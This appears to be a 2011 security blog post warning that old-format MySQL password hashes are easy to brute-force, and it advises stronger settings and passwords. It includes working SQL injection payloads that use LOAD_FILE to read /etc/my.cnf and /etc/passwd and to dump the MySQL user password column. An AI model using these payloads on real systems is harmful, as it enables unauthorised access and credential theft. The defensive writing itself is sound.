Old MySQL Passwords – Insecure and Easy to Crack
23/06/2011
In MySQL 4.1, the hashing algorithm used in to store passwords within MySQL was updated. This was as a result of security concerns with MySQL3.2.3 passwords. Despite this, many database installations are still specifying to use passwords in the old format.
Using the old password format a 16 byte hash is created such as:
6f8c114b58f2ce9e
For the same password the MySQL4.1 hash is 41 bytes long:
*6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4
On the surface it might seem that this extra level of security granted by using the new passwords might not be significant. However, source code has been released under the creative common license which allows very quick cracking of old MySQL password.
The password ‘a@4~1b’ has a hash of 2c28061c5bda971d.
Using the cracking program mentioned above, this password can be cracked in under 1 second on a 2 year old laptop.
By using a SQL injection attack it might be possible for a user without permission to view your my.cnf file. Entering this in a search box could render the contents of the file in the browser if the second param in the select statement was being shown on the screen and not escaped correctly:
something’ UNION ALL SELECT 1,(SELECT LOAD_FILE(‘/etc/my.cnf’)),3,4,5,password FROM user ORDER BY ’7
In a sample attack this returned the following information:
[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Default to using old password format for compatibility with mysql 3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1
This lets the attacker know that any mysql passwords which can be obtained can be easily cracked by brute force without the need for more complicated cracking techniques like rainbow tables or dictionary based attacks.
An SQL injection attack similar to the one above could be performed to get the passwords:
something’ UNION ALL SELECT 1,(SELECT LOAD_FILE(‘/etc/passwd’)),3,4,5,password FROM user ORDER BY ’7
While the passwords were cracking it would be possible to obtain all of the other information required:
something’ UNION ALL SELECT 1,(SELECT database()),3,4,5,password FROM user ORDER BY ’3
Once the user was in possession of all of this information, they would have complete control over the host database.
The advice would be not to use old MySQL passwords unless absolutely necessary. However, if you really do need to use old password there are a few rules you can follow to massively increase the time taken to brute force your password. Ensure your password:
- Is a minimum of 12 characters long
- Contains mixed characters including symbols
- Is not made up of words found in the dictionary